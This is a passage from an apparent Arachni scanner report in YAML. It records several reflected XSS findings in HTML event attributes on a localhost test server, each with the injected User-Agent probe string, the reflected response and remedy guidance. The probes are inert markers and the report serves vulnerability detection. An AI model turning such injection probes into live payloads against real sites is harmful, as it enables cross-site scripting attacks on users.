    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onfocus
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "424"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onfocus="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onfocus</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onfocus
      :id: <a href="/" onfocus="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onfocus</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onfocus=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onfocus</a><a href='/' onfocus="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onfocus</a><a href='/' onfocus='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onfocus</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onfocus
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onreset
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "424"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onreset="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onreset</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onreset
      :id: <a href="/" onreset="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onreset</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onreset=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onreset</a><a href='/' onreset="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onreset</a><a href='/' onreset='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onreset</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onreset
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onselect
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "430"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onselect="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onselect</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onselect
      :id: <a href="/" onselect="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onselect</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onselect=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onselect</a><a href='/' onselect="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onselect</a><a href='/' onselect='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onselect</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onselect
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onsubmit
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "430"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onsubmit="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onsubmit</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onsubmit
      :id: <a href="/" onsubmit="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onsubmit</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onsubmit=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onsubmit</a><a href='/' onsubmit="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onsubmit</a><a href='/' onsubmit='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onsubmit</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onsubmit
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onabort
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "424"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onabort="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onabort</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onabort
      :id: <a href="/" onabort="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onabort</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onabort=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onabort</a><a href='/' onabort="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onabort</a><a href='/' onabort='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onabort</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onabort
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onkeydown
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "436"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onkeydown="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeydown</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onkeydown
      :id: <a href="/" onkeydown="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeydown</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onkeydown=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onkeydown</a><a href='/' onkeydown="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeydown</a><a href='/' onkeydown='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onkeydown</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onkeydown
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onkeypress
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "442"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onkeypress="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeypress</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onkeypress
      :id: <a href="/" onkeypress="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeypress</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onkeypress=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onkeypress</a><a href='/' onkeypress="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeypress</a><a href='/' onkeypress='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onkeypress</a>
    severity: High
